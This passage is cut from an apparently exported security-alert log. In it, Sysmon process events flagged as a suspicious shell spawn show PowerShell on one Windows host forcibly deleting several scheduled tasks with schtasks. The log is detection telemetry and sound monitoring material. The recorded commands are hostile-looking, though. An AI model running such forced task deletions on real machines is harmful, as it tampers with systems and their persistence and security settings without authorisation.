+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.920287800Z"",""eventRecordID"":""2515"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.913\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010b7b41e00}\r\nProcessId: 2356\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:04.913"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010b7b41e00}"",""processId"":""2356"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.197",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.882 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001014b31e00} +ProcessId: 7136 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.890380300Z"",""eventRecordID"":""2514"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.882\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001014b31e00}\r\nProcessId: 7136\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.882"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001014b31e00}"",""processId"":""7136"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.181",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.851 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105bb11e00} +ProcessId: 7244 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.854574600Z"",""eventRecordID"":""2513"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.851\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105bb11e00}\r\nProcessId: 7244\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.851"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00105bb11e00}"",""processId"":""7244"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.166",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.826 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00109caf1e00} +ProcessId: 7984 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.838813700Z"",""eventRecordID"":""2512"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.826\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00109caf1e00}\r\nProcessId: 7984\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.826"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00109caf1e00}"",""processId"":""7984"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.136",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.798 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001069ad1e00} +ProcessId: 3532 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.799967700Z"",""eventRecordID"":""2511"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.798\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001069ad1e00}\r\nProcessId: 3532\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.798"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001069ad1e00}"",""processId"":""3532"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.118",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.774 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010a6ab1e00} +ProcessId: 3440 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.776531100Z"",""eventRecordID"":""2510"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.774\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010a6ab1e00}\r\nProcessId: 3440\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:04.774"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010a6ab1e00}"",""processId"":""3440"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.107",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.748 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010e8a91e00} +ProcessId: 1676 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
